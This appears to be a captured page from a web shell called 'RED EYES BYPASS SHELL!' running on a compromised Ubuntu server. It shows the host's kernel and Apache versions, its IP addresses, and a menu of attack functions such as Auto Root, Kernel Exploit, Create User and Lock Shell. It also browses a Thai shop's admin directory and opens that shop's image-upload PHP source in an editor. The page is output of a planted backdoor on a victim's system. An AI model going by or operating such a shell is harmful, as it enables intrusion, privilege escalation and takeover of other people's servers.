Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
app /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
bower_components
[ DIR ]
drwxr-xr-x
chart-pie
[ DIR ]
drwxr-xr-x
class
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
font-awesome
[ DIR ]
drwxr-xr-x
icon
[ DIR ]
drwxr-xr-x
img-banner
[ DIR ]
drwxr-xr-x
img-logo
[ DIR ]
drwxr-xr-x
img-new
[ DIR ]
drwxr-xr-x
img-slide
[ DIR ]
drwxr-xr-x
img-system
[ DIR ]
drwxr-xr-x
img-user
[ DIR ]
drwxr-xr-x
lightbox
[ DIR ]
drwxr-xr-x
modal
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
.htaccess
154
B
-rwxr-xr-x
about.php
4.15
KB
-rwxr-xr-x
category.php
11.37
KB
-rwxr-xr-x
check_login.php
424
B
-rwxr-xr-x
company.php
13.02
KB
-rwxr-xr-x
edit_service.php
4.65
KB
-rwxr-xr-x
footer.php
249
B
-rwxr-xr-x
header.php
766
B
-rwxr-xr-x
import_script.php
4.4
KB
-rwxr-xr-x
import_style.php
1.28
KB
-rwxr-xr-x
index.php
2.97
KB
-rwxr-xr-x
logout.php
77
B
-rwxr-xr-x
manage_service.php
4.46
KB
-rwxr-xr-x
menu_left.php
2.87
KB
-rwxr-xr-x
menu_main.php
88
B
-rwxr-xr-x
message.php
3.82
KB
-rwxr-xr-x
new.php
10.32
KB
-rwxr-xr-x
person.php
9.81
KB
-rwxr-xr-x
position.php
7.08
KB
-rwxr-xr-x
report.php
11.55
KB
-rwxr-xr-x
reportSale.php
4.55
KB
-rwxr-xr-x
sent.php
1.78
KB
-rwxr-xr-x
service.php
9.92
KB
-rwxr-xr-x
slide.php
10.61
KB
-rwxr-xr-x
type_user.php
549
B
-rwxr-xr-x
uploadImage.php
9.53
KB
-rwxr-xr-x
upload_img.php
793
B
-rwxr-xr-x
user.php
10.07
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : uploadImage.php
<?php session_start(); include('../config/connect.php'); include('type_user.php'); ?> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title><?php echo $title;?></title> <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport"> <?php include('import_style.php');?> <!-- Google Font --> <link href="https://fonts.googleapis.com/css?family=Kanit:100,200,300&subset=thai" rel="stylesheet"> </head> <body class="hold-transition skin-blue sidebar-mini"> <?php include('check_login.php');?> <div class="wrapper"> <?php include('header.php');?> <?php include('menu_left.php');?> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <!-- Content Header (Page header) --> <?php include('menu_main.php'); ?> <!-- Main content --> <section class="content"> <!--เนื้อหา--> <?php $product_id = $_GET['product_id']; $product_status = "1"; $stmt = $conn->prepare("SELECT p.*, c.category_name FROM tb_product AS p LEFT JOIN tb_category AS c ON p.category_id = c.category_id WHERE p.product_status=:product_status AND p.product_id=:product_id"); $stmt->bindParam(':product_status', $product_status , PDO::PARAM_STR); $stmt->bindParam(':product_id', $product_id , PDO::PARAM_STR); $stmt->execute(); $row = $stmt->fetch(PDO::FETCH_ASSOC); ?> <div class="row"> <div class="col-lg-12 col-md-12"> <div class="box"> <div class="box-header bg-theme text-center"> <h3 class="box-title"><b>อัปโหลดรูปภาพสินค้า</b></h3> </div> <!-- /.box-header --> <?php include('modal/form-add-modal.php');?> <div class="box-body"> <form method="post" enctype="multipart/form-data"> <div class="row"> <div class="form-group col-md-2"> <label>รูปภาพสินค้าหลัก</label> <p><img src="img-product/<?php echo $row['product_img'];?>" width="120"></p> </div> <div class="form-group col-md-4"> <label>เปลี่ยนรูปภาพสินค้าหลัก</label> <input type="file" name="product_img" class="form-control" accept="image/*"> </div> <div class="form-group col-md-4"> <label> </label><br> <button type="button" class="btn btn bg-theme" data-toggle="modal" data-target="#uploadImage<?php echo $row['product_id'];?>"> <span class="fa fa-upload"></span> เพิ่มรูปภาพ </button> </div> </div> <!--./row--> <div class="row"> <div class="form-group col-md-12"> <label>ชื่อสินค้า</label> <input type="text" name="product_name" value="<?php echo $row['product_name'];?>" class="form-control" required> </div> <div class="form-group col-md-4"> <label>รหัสสินค้า</label> <input type="text" name="product_id" value="<?php echo $row['product_id'];?>" class="form-control" required> </div> <div class="form-group col-md-4"> <label>ราคาสินค้า</label> <input type="number" name="product_price" value="<?php echo $row['product_price'];?>" class="form-control" required> </div> <div class="form-group col-md-2"> <label>จำนวนสินค้าทั้งหมด</label> <input type="number" name="product_item" value="<?php echo $row['product_item'];?>" class="form-control" required> </div> <div class="form-group col-md-2"> <label>จำนวนสินค้าคงเหลือ</label> <input type="number" name="product_stock" value="<?php echo $row['product_stock'];?>" class="form-control" required> </div> <div class="form-group col-md-4"> <label>หมวดหมู่สินค้า</label> <select name="category_id" class="form-control" required=""> <option value="">เลือกหมวดหมู่สินค้า</option> <?php $category_status = "0"; $stmt2 = $conn->prepare("SELECT category_id, category_name FROM tb_category WHERE category_status <> :category_status ORDER BY category_id ASC"); $stmt2->bindParam(':category_status', $category_status , PDO::PARAM_STR); $stmt2->execute(); $result2 = $stmt2->fetchAll(); foreach($result2 as $row2) { ?> <option value="<?php echo $row2['category_id'];?>" <?php if($row['category_id'] == $row2['category_id']) { echo "selected"; } else { echo ""; } ?> ><?php echo $row2['category_name'];?></option> <?php } ?> </select> </div> <div class="form-group col-md-2"> <label>จำนวนการเข้าชม</label> <input type="number" name="product_view" value="<?php echo $row['product_view'];?>" class="form-control" required> </div> </div> <!--./row--> <div class="row"> <div class="col-md-12"> <input type="hidden" name="product_id" value="<?php echo $row['product_id'];?>"> <input type="hidden" name="company_logo_bf" value="<?php echo $company_logo;?>"> </div> </div> <div class="row"> <?php $stmt_product = $conn->prepare("SELECT product_img_id, product_img_name FROM tb_product_img WHERE product_id=:product_id ORDER BY product_img_id ASC"); $stmt_product->bindParam(':product_id', $product_id , PDO::PARAM_INT); $stmt_product->execute(); $result_product = $stmt_product->fetchAll(); foreach($result_product as $row_product) { ?> <div class="col-md-2 mt-5"> <img class="img-rounded img-responsive" src="img-product-item/<?php echo $row_product['product_img_name'];?>" width="100%"> </div> <!--./col--> <?php } ?> </div> <!--./row--> </form> <?php if(isset($_POST['btnUploadImg'])){ $product_id = $_POST['product_id']; $user_id = $_SESSION['user_id']; $date1 = date("Y-m-d"); $numrand = (mt_rand()); $product_img_name = (isset($_POST['product_img_name']) ? $_POST['product_img_name'] : ''); $upload = $_FILES['product_img_name']['name']; if($upload != '') { $typefile = strrchr($_FILES['product_img_name']['name'],"."); if($typefile =='.jpg' || $typefile =='.jpeg' || $typefile =='.png') { $path = "img-product-item/"; $newname = $numrand.$date1.$typefile; $path_copy = $path.$newname; move_uploaded_file($_FILES['product_img_name']['tmp_name'],$path_copy); } else { //ถ้าไฟล์ที่อัพโหลดไม่ตรงตามที่กำหนดไว้ echo ' <script> swal({ title: "ไม่สามารถ Upload ไฟล์ได้", text: "เนื่องจากนามสกุลไฟล์ที่คุณ Upload ไม่ถูกต้อง", icon: "error", button: "ตกลง", }).then( () => { location.href = "'.$_SERVER['REQUEST_URI'].'" }); </script> '; exit(); } } else { $newname = "-"; } $stmt = $conn->prepare("INSERT INTO tb_product_img(product_img_name, product_id, user_id) VALUES (:product_img_name, :product_id, :user_id)"); $stmt->bindParam(':product_img_name', $newname , PDO::PARAM_STR); $stmt->bindParam(':product_id', $product_id , PDO::PARAM_INT); $stmt->bindParam(':user_id', $user_id , PDO::PARAM_INT); $result = $stmt->execute(); if($result){ echo ' <script> swal({ title: "อัปโหลดรูปภาพสำเร็จ", icon: "success", button: "ตกลง", }).then( () => { location.href = "'.$_SERVER['REQUEST_URI'].'" }); </script> '; } else { echo ' <script> swal({ title: "Error เกิดข้อผิดพลาด", icon: "error", button: "ตกลง", }).then( () => { location.href = "'.$_SERVER['REQUEST_URI'].'" }); </script> '; } } ?> </div> <!-- /.box-body --> </div> <!-- /.box --> </div> <!-- /.col --> </div> <!-- ./row--> <!--ปิดเนื้อหา--> </section> <!-- /.content --> </div> <!-- /.content-wrapper --> <?php include('footer.php');?> <div class="control-sidebar-bg"></div> </div> <!-- ./wrapper --> <?php include('import_script.php');?> </body> </html> <?php $conn = null; ?>
Close